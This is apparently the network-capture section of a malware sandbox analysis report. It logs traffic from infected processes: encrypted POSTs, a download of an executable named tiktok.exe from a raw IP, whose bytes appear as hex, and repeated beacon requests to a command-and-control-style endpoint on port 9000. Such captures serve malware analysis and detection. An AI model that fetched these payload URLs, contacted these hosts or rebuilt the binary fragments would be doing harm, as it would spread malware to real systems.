Apr 26, 2024 10:27:11.233598948 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 26, 2024 10:27:11.233818054 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 26, 2024 10:27:11.233882904 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 26, 2024 10:27:11.234009027 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 26, 2024 10:27:11.234195948 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 26, 2024 10:27:11.234496117 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 26, 2024 10:27:11.234553099 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 26, 2024 10:27:11.234592915 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 26, 2024 10:27:11.474953890 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	20.157.87.45	80	7608	C:\Users\user\AppData\Local\Temp\u5mc.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:15.118719101 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 26, 2024 10:27:15.363346100 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 26, 2024 10:27:15.593249083 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb5 date: Fri, 26 Apr 2024 08:27:14 GMT set-cookie: SERVERID=svc5; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	20.157.87.45	80	7608	C:\Users\user\AppData\Local\Temp\u5mc.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:33.735176086 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 26, 2024 10:27:33.979078054 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 26, 2024 10:27:34.238248110 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb9 date: Fri, 26 Apr 2024 08:27:32 GMT set-cookie: SERVERID=svc9; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	185.172.128.203	80	7364	C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:39.521770000 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 26, 2024 10:27:39.761651993 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 08:27:39 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 60 bc 47 00 e8 ab 56 05 00 68 ff be Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B`GVh
Apr 26, 2024 10:27:39.761940956 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 26, 2024 10:27:39.761997938 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 26, 2024 10:27:39.762115002 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
Apr 26, 2024 10:27:39.762207985 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 26, 2024 10:27:39.762564898 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 26, 2024 10:27:39.762631893 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 26, 2024 10:27:39.762671947 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
Apr 26, 2024 10:27:39.762747049 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 26, 2024 10:27:39.762809992 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 26, 2024 10:27:40.001611948 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49761	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:44.410900116 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:44.687813997 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:43 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49762	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:45.080888987 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:45.362318039 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:44 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49763	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:45.770550013 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:46.069047928 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:46.653110027 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:47.833381891 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49765	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:48.524322033 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:48.801810980 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:49.217916012 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:49.494795084 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:48 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49767	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:49.884903908 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:50.162336111 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49769	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:50.558487892 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:50.845623970 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
